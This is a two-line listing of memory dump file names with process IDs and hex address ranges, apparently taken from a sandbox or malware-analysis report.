memory/928-76-0x00000000077D0000-0x00000000077D1000-memory.dmp

memory/3960-148-0x0000000000400000-0x000000000067B000-memory.dmp